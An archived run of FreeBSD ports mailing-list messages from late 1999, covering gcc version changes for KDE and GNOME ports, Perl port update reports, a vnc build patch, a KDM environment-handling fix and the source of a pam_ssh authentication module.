> requiring the new gcc and marking as broken for < -current until the > > > qt/kde apps require the new gcc and/or mainstream release uses it. > > > > USE_NEWGCC= yes > > > > But the app will not link if the kde libs are compiled with the old g++ > (2.7.2.3) Checking back in the -ports archives, we considered bumping the shared library version numbers of all the KDE libraries at the same time as adding in USE_NEWGCC. It seemed to be the least messy way to do things, though there will be (understandable) muttering about having to install gcc-2.95.2 on -STABLE. But the compiler gap between -STABLE and -CURRENT is now so wide that such measures do probably need to be taken. If such a change does happen, it may also be worth considering synchronising it with a move to USE_NEWGCC for the GNOME metaport, since there seems to be increasing amount of third-party code that can take advantage of both environments. -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 18:35:25 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 0E5D615020; Sun, 28 Nov 1999 18:35:22 -0800 (PST) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.03 #1) id 11sGeu-0004hz-00; Sun, 28 Nov 1999 19:35:21 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.3) id VAA31679; Sun, 28 Nov 1999 21:35:16 -0500 (EST) (envelope-from will) Message-ID: X-Mailer: XFMail 1.3.1 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <19991128201850.A61560@lovett.com> Date: Sun, 28 Nov 1999 21:35:16 -0500 (EST) Reply-To: Will Andrews From: Will Andrews To: Ade Lovett Subject: Re: ports/15135: new port: devel/cervisia Cc: freebsd-ports@FreeBSD.org, Bill Fumerola , "Chris D. Faulhaber" , "David E. O'Brien" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 29-Nov-99 Ade Lovett wrote: > But the compiler gap between -STABLE and -CURRENT is now so wide that > such measures do probably need to be taken. I agree with this particular statement.. frankly, I've wondered why gcc 2.91.66 wasn't MFC'd to 3.x long ago (David?). After all, it's been in -CURRENT for several months (at the very least). And all we need is 2.91.66, since that is the earliest version (that I know of) which supports the newer ANSI ISO C++ standards. That is, the new standard apparently not supported by the older gcc. Can we not MFC gcc 2.91.66 to RELENG_3 for a future version of 3.x? I am sure this can be done, although I can also hear some people wondering whether this is common sense, since some people may not need the support boasted by the new gcc. > If such a change does happen, it may also be worth considering synchronising > it with a move to USE_NEWGCC for the GNOME metaport, since there seems to > be increasing amount of third-party code that can take advantage of both > environments. I also agree here.. although I can't think of any ports offhand that require newgcc and gnome (and/or kde). Bottom line - I don't think it will be long before newgcc will be required all over the KDE & GNOME plates. The sooner it's implemented, the better. Thus, in the next updates for KDE and GNOME ports, we really should do a version bump (i.e., libkdeui.so.2 -> libkdeui.so.6 or similar) in order to force people to use newgcc in order to get the newer apps compiled properly. Of course, that means we'd have to sync all the KDE and GNOME-based apps depending on newgcc'd libraries. It's just another hurdle. Similar to marcel's fame. -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 19:10: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DC7AF151CE for ; Sun, 28 Nov 1999 19:10:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA87469; Sun, 28 Nov 1999 19:10:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 85E2C151CE; Sun, 28 Nov 1999 19:07:29 -0800 (PST) Message-Id: <19991129030729.85E2C151CE@hub.freebsd.org> Date: Sun, 28 Nov 1999 19:07:29 -0800 (PST) From: wolman@cs.washington.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15153: bugfix for the p5-Mysql port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15153 >Category: ports >Synopsis: bugfix for the p5-Mysql port >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 19:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alec Wolman >Release: 3.3 >Organization: UW, CSE Department >Environment: n/a >Description: The p5-Mysql port uses two other perl components (p5-DBI and p5-Data-ShowTable), but only has them listed as BUILD_DEPENDS. This patch adds them as RUN_DEPENDS. You can download the patch from http://www.cs.washington.edu/homes/wolman/patches/p5-Mysql.patch >How-To-Repeat: n/a >Fix: see above. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 19:20: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3547C151E8 for ; Sun, 28 Nov 1999 19:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA88047; Sun, 28 Nov 1999 19:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 53D4F152BD; Sun, 28 Nov 1999 19:10:07 -0800 (PST) Message-Id: <19991129031007.53D4F152BD@hub.freebsd.org> Date: Sun, 28 Nov 1999 19:10:07 -0800 (PST) From: wolman@cs.washington.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15154: update the p5-SQL-Statement port to version 0.1016 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15154 >Category: ports >Synopsis: update the p5-SQL-Statement port to version 0.1016 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 19:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alec Wolman >Release: 3.3 >Organization: UW, CSE Department >Environment: n/a >Description: The following patch upgrades the p5-SQL-Statement port to version 0.1016. http://www.cs.washington.edu/homes/wolman/patches/p5-SQL-Statement.patch >How-To-Repeat: n/a >Fix: n/a >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 19:20: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8701015211 for ; Sun, 28 Nov 1999 19:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA88056; Sun, 28 Nov 1999 19:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 5B559151CE; Sun, 28 Nov 1999 19:13:55 -0800 (PST) Message-Id: <19991129031355.5B559151CE@hub.freebsd.org> Date: Sun, 28 Nov 1999 19:13:55 -0800 (PST) From: wolman@cs.washington.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15155: update of p5-ReadLine-Perl to version 0.9907 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15155 >Category: ports >Synopsis: update of p5-ReadLine-Perl to version 0.9907 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 19:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alec Wolman >Release: 3.3 >Organization: UW, CSE Department >Environment: n/a >Description: The following patch upgrades the p5-ReadLine-Perl port to version 0.9907. http://www.cs.washington.edu/homes/wolman/patches/p5-ReadLine-Perl.patch >How-To-Repeat: n/a >Fix: n/a >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 19:20: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6E99915219 for ; Sun, 28 Nov 1999 19:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA88062; Sun, 28 Nov 1999 19:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 28 Nov 1999 19:20:03 -0800 (PST) Message-Id: <199911290320.TAA88062@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Chris D. Faulhaber" Subject: Re: ports/15153: bugfix for the p5-Mysql port Reply-To: "Chris D. Faulhaber" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15153; it has been noted by GNATS. From: "Chris D. Faulhaber" To: wolman@cs.washington.edu Cc: freebsd-gnats-submit@freebsd.org Subject: Re: ports/15153: bugfix for the p5-Mysql port Date: Sun, 28 Nov 1999 22:19:57 -0500 (EST) On Sun, 28 Nov 1999 wolman@cs.washington.edu wrote: > The p5-Mysql port uses two other perl components (p5-DBI and > p5-Data-ShowTable), but only has them listed as BUILD_DEPENDS. > This patch adds them as RUN_DEPENDS. > If p5-DBI and p5-Data-ShowTable are present when the port is built, why would they not be present at run-time? Are you experiencing an error? ----- Chris D. Faulhaber | All the true gurus I've met never System/Network Administrator, | claimed they were one, and always Reality Check Information, Inc. | pointed to someone better. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 19:22: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 6710E14C23 for ; Sun, 28 Nov 1999 19:21:44 -0800 (PST) (envelope-from jedgar@fxp.org) Received: from earth.fxp (oca-c1s2-43.mfi.net [209.26.94.90]) by pawn.primelocation.net (Postfix) with ESMTP id A335F9B39; Sun, 28 Nov 1999 22:21:39 -0500 (EST) Date: Sun, 28 Nov 1999 22:21:36 -0500 (EST) From: "Chris D. Faulhaber" X-Sender: jedgar@earth.fxp To: ports@freebsd.org Cc: bmah@ca.sandia.gov Subject: vnc & gcc 2.95.2 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It appears vnc suffers the same problem that XFree did w/gcc 2.95.2. The following is a patch (patches/patch-ab as such) that corrects this. Can anyone verify this works under gcc 2.7.2.3 and/or comment? --- Xvnc/config/imake/imakemdep.h.orig Sat Jul 26 22:41:05 1997 +++ Xvnc/config/imake/imakemdep.h Sun Nov 28 22:11:34 1999 @@ -225,6 +225,9 @@ #ifdef hpux #define USE_CC_E #endif +#if defined(__FreeBSD__) +#define USE_CC_E +#endif #ifdef WIN32 #define USE_CC_E #define DEFAULT_CC "cl" @@ -253,7 +256,7 @@ #ifdef _CRAY #define DEFAULT_CPP "/lib/pcpp" #endif -#if defined(__386BSD__) || defined(__NetBSD__) || defined(__OpenBSD__) || defined(__FreeBSD__) +#if defined(__386BSD__) || defined(__NetBSD__) || defined(__OpenBSD__) #define DEFAULT_CPP "/usr/libexec/cpp" #endif #if defined(__sgi) && defined(__ANSI_CPP__) ----- Chris D. Faulhaber | You can ISO9001 certify the process of System/Network Administrator, | shooting yourself in the foot, so long Reality Check Information, Inc. | as the process is documented and reliably | produces the proper result. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 19:30: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 44CAD14F98 for ; Sun, 28 Nov 1999 19:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA88672; Sun, 28 Nov 1999 19:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 1C17714A00; Sun, 28 Nov 1999 19:20:55 -0800 (PST) Message-Id: <19991129032055.1C17714A00@hub.freebsd.org> Date: Sun, 28 Nov 1999 19:20:55 -0800 (PST) From: wolman@cs.washington.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15156: update of p5-URI to version 1.04 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15156 >Category: ports >Synopsis: update of p5-URI to version 1.04 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 19:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alec Wolman >Release: 3.3 >Organization: UW, CSE Department >Environment: n/a >Description: The following patch upgrades the p5-URI port to version 1.04. It also adds p5-MIME-Base64 to RUN_DEPENDS, and it puts the packing list in alphabetical order. http://www.cs.washington.edu/homes/wolman/patches/p5-URI.patch >How-To-Repeat: n/a >Fix: n/a >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 19:30: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 95A1B15073 for ; Sun, 28 Nov 1999 19:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA88681; Sun, 28 Nov 1999 19:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from tempest.waterspout.com (tempest.waterspout.com [208.13.56.2]) by hub.freebsd.org (Postfix) with ESMTP id 7C7CB14CB5 for ; Sun, 28 Nov 1999 19:26:13 -0800 (PST) (envelope-from ajk@tempest.waterspout.com) Received: (from ajk@localhost) by tempest.waterspout.com (8.9.3/8.9.3) id WAA93687; Sun, 28 Nov 1999 22:26:07 -0500 (EST) (envelope-from ajk) Message-Id: <199911290326.WAA93687@tempest.waterspout.com> Date: Sun, 28 Nov 1999 22:26:07 -0500 (EST) From: ajk@waterspout.com Reply-To: ajk@waterspout.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15157: [PATCH] Environment Botch in KDM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15157 >Category: ports >Synopsis: [PATCH] Environment Botch in KDM >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 19:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrew J. Korty >Release: FreeBSD 4.0-CURRENT i386 >Organization: Waterspout Communications >Environment: FreeBSD tempest.waterspout.com 4.0-CURRENT FreeBSD 4.0-CURRENT #22: Sat Nov 20 07:41:01 EST 1999 root@tempest.waterspout.com:/usr/src/sys/compile/TEMPEST i386 >Description: This patch replaces patch-au in the kdebase11 port. The original code was indended to clear the environment vector, but it seems to limit the vector to one string. It also causes my pam_ssh module (to be contributed this week) not to work, presumably because the environment vector gets overflowed to the point of causing a segmentation fault. >How-To-Repeat: Configure with --with-pam and recompile. Add my pam_ssh module to /etc/pam.conf for service "xdm" and management groups "auth" and "session". Type your username and SSH private key passphrase in the KDM dialog. In my tests, KDM will SEGV while setting up the environment vector in preparation for running the Xsession script. I presume any PAM module that augments the environment vector would cause similar behavior. >Fix: --- kdm/session.c.orig Sun Nov 28 20:27:30 1999 +++ kdm/session.c Sun Nov 28 20:26:00 1999 @@ -676,7 +676,6 @@ extern char **environ; char ** e; struct passwd *pwd; - char *envinit[1]; #endif if (verify->argv) { @@ -717,8 +716,8 @@ * We need to do this before setusercontext() because that may * set or reset some environment variables. */ - envinit[0] = NULL; - environ = envinit; + if (environ && *environ) + *environ = NULL; /* * Set the user's credentials: uid, gid, groups, >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 20:20: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 20DC6153CC for ; Sun, 28 Nov 1999 20:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA92988; Sun, 28 Nov 1999 20:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from tempest.waterspout.com (tempest.waterspout.com [208.13.56.2]) by hub.freebsd.org (Postfix) with ESMTP id 58B3115248; Sun, 28 Nov 1999 20:15:30 -0800 (PST) (envelope-from ajk@tempest.waterspout.com) Received: (from ajk@localhost) by tempest.waterspout.com (8.9.3/8.9.3) id XAA98920; Sun, 28 Nov 1999 23:15:24 -0500 (EST) (envelope-from ajk) Message-Id: <199911290415.XAA98920@tempest.waterspout.com> Date: Sun, 28 Nov 1999 23:15:24 -0500 (EST) From: ajk@waterspout.com Reply-To: ajk@waterspout.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15158: [PATCH] PAM module for authenticating via SSH passphrase Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15158 >Category: ports >Synopsis: [PATCH] PAM module for authenticating via SSH passphrase >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Nov 28 20:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrew J. Korty >Release: FreeBSD 4.0-CURRENT i386 >Organization: Waterspout Communications >Environment: FreeBSD tempest.waterspout.com 4.0-CURRENT FreeBSD 4.0-CURRENT #22: Sat Nov 20 07:41:01 EST 1999 root@tempest.waterspout.com:/usr/src/sys/compile/TEMPEST i386 >Description: Here is a PAM module that allows users to authenticate by typing their SSH passphrases into KDM, the login program, or anything else with PAM support. If used as a session module as well, an ssh-agent is started and the private key is added on behalf of the user. If your users only login via SSH or directly on the console, you can get rid of UNIX passwords in /etc/master.passwd. Naturally, this module is only for use when logging onto the console. The module should be placed after pam_cleartext_pass_ok.so in /etc/pam.conf, and users should be informed what situations are inappropriate for typing their SSH passphrases. The patches below apply to the OpenSSH port. (They are meant to be applied before any of the patches in the "patches" subdirectory.) >How-To-Repeat: This module works best with KDM, which has full PAM support. Configure it with --with-pam, apply the patch I submitted in ports/15157, recompile, and reinstall KDM. Apply the patches below to the OpenSSH sources, and then install the port. Add the following lines to /etc/pam.conf: xdm auth sufficient pam_skey.so xdm auth requisite pam_cleartext_pass_ok.so xdm auth sufficient pam_ssh.so try_first_pass xdm auth required pam_unix.so try_first_pass xdm account required pam_unix.so xdm session optional pam_ssh.so Kill and restart KDM. >Fix: --- Makefile.orig Sun Nov 28 22:04:38 1999 +++ Makefile Sun Nov 28 22:04:43 1999 @@ -3,7 +3,7 @@ .include .include "Makefile.inc" -SUBDIR= lib ssh sshd ssh-add ssh-keygen ssh-agent scp +SUBDIR= lib pam_ssh ssh sshd ssh-add ssh-keygen ssh-agent scp distribution: install -C -o root -g wheel -m 0644 ${.CURDIR}/ssh_config \ --- /dev/null Sun Nov 28 22:52:46 1999 +++ pam_ssh/Makefile Sun Nov 28 22:52:41 1999 @@ -0,0 +1,13 @@ +.PATH: ${.CURDIR}/.. + +LIB= pam_ssh +DESTDIR= +SHLIB_NAME= pam_ssh.so +SRCS= log-client.c pam_ssh.c +CFLAGS+= -Wall +DPADD+= ${LIBCRYPTO} ${LIBDES} ${LIBUTIL} ${LIBZ} ${LIBGCC_PIC} +LDADD+= ${CRYPTOLIBS} -lutil -lz -lgcc_pic +INTERNALLIB= yes +INTERNALSTATICLIB=yes + +.include --- /dev/null Sun Nov 28 22:04:39 1999 +++ pam_ssh.c Sun Nov 28 21:59:23 1999 @@ -0,0 +1,298 @@ +#include + +#include +#include +#include +#include +#include +#include +#include + +#define PAM_SM_AUTH +#define PAM_SM_SESSION +#include +#include + +#include "includes.h" +#include "rsa.h" +#include "ssh.h" +#include "authfd.h" + +#define MODULE_NAME "pam_ssh" +#define NEED_PASSPHRASE "Need passphrase for %s (%s).\nEnter passphrase: " +#define PATH_SSH_AGENT "/usr/local/bin/ssh-agent" + + +void +rsa_cleanup(pam_handle_t *pamh, void *data, int error_status) +{ + if (data) + RSA_free(data); +} + + +void +ssh_cleanup(pam_handle_t *pamh, void *data, int error_status) +{ + if (data) + free(data); +} + + +typedef struct passwd PASSWD; + +PAM_EXTERN int +pam_sm_authenticate( + pam_handle_t *pamh, + int flags, + int argc, + const char **argv) +{ + char *comment_priv; /* on private key */ + char *comment_pub; /* on public key */ + char *identity; /* user's identity file */ + RSA *key; /* user's private key */ + int options; /* module options */ + const char *pass; /* passphrase */ + char *prompt; /* passphrase prompt */ + RSA *public_key; /* user's public key */ + const PASSWD *pwent; /* user's passwd entry */ + PASSWD *pwent_keep; /* our own copy */ + int retval; /* from calls */ + uid_t saved_uid; /* caller's uid */ + const char *user; /* username */ + + options = 0; + while (argc--) + pam_std_option(&options, *argv++); + if ((retval = pam_get_user(pamh, &user, NULL)) != PAM_SUCCESS) + return retval; + if (!((pwent = getpwnam(user)) && pwent->pw_dir)) { + /* delay? */ + return PAM_AUTH_ERR; + } + /* locate the user's private key file */ + if (!asprintf(&identity, "%s/%s", pwent->pw_dir, + SSH_CLIENT_IDENTITY)) { + syslog(LOG_CRIT, "%s: %m", MODULE_NAME); + return PAM_SERVICE_ERR; + } + /* + * Fail unless we can load the public key. Change to the + * owner's UID to appease load_public_key(). + */ + key = RSA_new(); + public_key = RSA_new(); + saved_uid = getuid(); + (void) setreuid(pwent->pw_uid, saved_uid); + retval = load_public_key(identity, public_key, &comment_pub); + (void) setuid(saved_uid); + if (!retval) { + free(identity); + return PAM_AUTH_ERR; + } + RSA_free(public_key); + /* build the passphrase prompt */ + retval = asprintf(&prompt, NEED_PASSPHRASE, identity, comment_pub); + free(comment_pub); + if (!retval) { + syslog(LOG_CRIT, "%s: %m", MODULE_NAME); + free(identity); + return PAM_SERVICE_ERR; + } + /* pass prompt message to application and receive passphrase */ + retval = pam_get_pass(pamh, &pass, prompt, options); + free(prompt); + if (retval != PAM_SUCCESS) { + free(identity); + return retval; + } + /* + * Try to decrypt the private key with the passphrase provided. + * If success, the user is authenticated. + */ + (void) setreuid(pwent->pw_uid, saved_uid); + retval = load_private_key(identity, pass, key, &comment_priv); + free(identity); + (void) setuid(saved_uid); + if (!retval) + return PAM_AUTH_ERR; + /* + * Save the key and comment to pass to ssh-agent in the session + * phase. + */ + if ((retval = pam_set_data(pamh, "ssh_private_key", key, + rsa_cleanup)) != PAM_SUCCESS) { + RSA_free(key); + free(comment_priv); + return retval; + } + if ((retval = pam_set_data(pamh, "ssh_key_comment", comment_priv, + ssh_cleanup)) != PAM_SUCCESS) { + free(comment_priv); + return retval; + } + /* + * Copy the passwd entry (in case successive calls are made) + * and save it for the session phase. + */ + if (!(pwent_keep = malloc(sizeof *pwent))) { + syslog(LOG_CRIT, "%m"); + return PAM_SERVICE_ERR; + } + (void) memcpy(pwent_keep, pwent, sizeof *pwent_keep); + if ((retval = pam_set_data(pamh, "ssh_passwd_entry", pwent_keep, + ssh_cleanup)) != PAM_SUCCESS) { + free(pwent_keep); + return retval; + } + return PAM_SUCCESS; +} + + +PAM_EXTERN int +pam_sm_setcred( + pam_handle_t *pamh, + int flags, + int argc, + const char **argv) +{ + return PAM_SUCCESS; +} + + +typedef AuthenticationConnection AC; + +PAM_EXTERN int +pam_sm_open_session( + pam_handle_t *pamh, + int flags, + int argc, + const char **argv) +{ + AC *ac; /* to ssh-agent */ + char *comment; /* on private key */ + char *env_end; /* end of env */ + char *env_file; /* to store env */ + FILE *env_fp; /* env_file handle */ + RSA *key; /* user's private key */ + FILE *pipe; /* ssh-agent handle */ + const PASSWD *pwent; /* user's passwd entry */ + int retval; /* from calls */ + uid_t saved_uid; /* caller's uid */ + const char *tty; /* tty or display name */ + char hname[MAXHOSTNAMELEN]; /* local hostname */ + char parse[BUFSIZ]; /* commands output */ + + /* dump output of ssh-agent in ~/.ssh */ + if ((retval = pam_get_data(pamh, "ssh_passwd_entry", + (const void **)&pwent)) != PAM_SUCCESS) + return retval; + /* use the tty or X display name in the filename */ + if ((retval = pam_get_item(pamh, PAM_TTY, (const void **)&tty)) + != PAM_SUCCESS) + return retval; + if (*tty == ':' && gethostname(hname, sizeof hname) == 0) { + if (asprintf(&env_file, "%s/.ssh/agent-%s%s", + pwent->pw_dir, hname, tty) == -1) { + syslog(LOG_CRIT, "%s: %m", MODULE_NAME); + return PAM_SERVICE_ERR; + } + } else if (asprintf(&env_file, "%s/.ssh/agent-%s", pwent->pw_dir, + tty) == -1) { + syslog(LOG_CRIT, "%s: %m", MODULE_NAME); + return PAM_SERVICE_ERR; + } + /* save the filename so we can delete the file on session close */ + if ((retval = pam_set_data(pamh, "ssh_agent_env", env_file, + ssh_cleanup)) != PAM_SUCCESS) { + free(env_file); + return retval; + } + /* start the agent as the user */ + saved_uid = geteuid(); + (void) seteuid(pwent->pw_uid); + env_fp = fopen(env_file, "w"); + pipe = popen(PATH_SSH_AGENT, "r"); + (void) seteuid(saved_uid); + if (!pipe) { + syslog(LOG_ERR, "%s: %s: %m", MODULE_NAME, PATH_SSH_AGENT); + if (env_fp) + (void) fclose(env_fp); + return PAM_SESSION_ERR; + } + while (fgets(parse, sizeof parse, pipe)) { + if (env_fp) + (void) fputs(parse, env_fp); + /* + * Save environment for application with pam_putenv() + * but also with putenv() for our own call to + * ssh_get_authentication_connection(). + */ + if (strchr(parse, '=') && (env_end = strchr(parse, ';'))) { + *env_end = '\0'; + /* pass to the application ... */ + if (!((retval = pam_putenv(pamh, parse)) == + PAM_SUCCESS && putenv(parse) == 0)) { + (void) pclose(pipe); + if (env_fp) + (void) fclose(env_fp); + return PAM_SERVICE_ERR; + } + } + } + if (env_fp) + (void) fclose(env_fp); + retval = pclose(pipe); + if (retval > 0) { + syslog(LOG_ERR, "%s: %s exited with status %d", + MODULE_NAME, PATH_SSH_AGENT, WEXITSTATUS(retval)); + return PAM_SESSION_ERR; + } else if (retval < 0) { + syslog(LOG_ERR, "%s: %s: %m", MODULE_NAME, PATH_SSH_AGENT); + return PAM_SESSION_ERR; + } + /* connect to the agent and hand off the private key */ + if ((retval = pam_get_data(pamh, "ssh_private_key", + (const void **)&key)) != PAM_SUCCESS) + return retval; + if ((retval = pam_get_data(pamh, "ssh_key_comment", + (const void **)&comment)) != PAM_SUCCESS) + return retval; + if (!(ac = ssh_get_authentication_connection())) { + syslog(LOG_ERR, "%s: could not connect to agent", + MODULE_NAME); + return PAM_SESSION_ERR; + } + retval = ssh_add_identity(ac, key, comment); + ssh_close_authentication_connection(ac); + return retval ? PAM_SUCCESS : PAM_SESSION_ERR; +} + + +PAM_EXTERN int +pam_sm_close_session( + pam_handle_t *pamh, + int flags, + int argc, + const char **argv) +{ + const char *env_file; /* ssh-agent environment */ + int retval; /* from calls */ + + /* kill the agent */ + if ((retval = system(PATH_SSH_AGENT " -k")) != 0) { + syslog(LOG_ERR, "%s: %s -k exited with status %d", + MODULE_NAME, PATH_SSH_AGENT, WEXITSTATUS(retval)); + return PAM_SESSION_ERR; + } + /* retrieve environment filename, then remove the file */ + if ((retval = pam_get_data(pamh, "ssh_agent_env", + (const void **)&env_file)) != PAM_SUCCESS) + return retval; + (void) unlink(env_file); + return PAM_SUCCESS; +} + + +PAM_MODULE_ENTRY(MODULE_NAME); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sun Nov 28 21: 5:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [169.237.7.38]) by hub.freebsd.org (Postfix) with ESMTP id 14E891548B for ; Sun, 28 Nov 1999 21:05:46 -0800 (PST) (envelope-from obrien@NUXI.com) Received: from dragon.nuxi.com 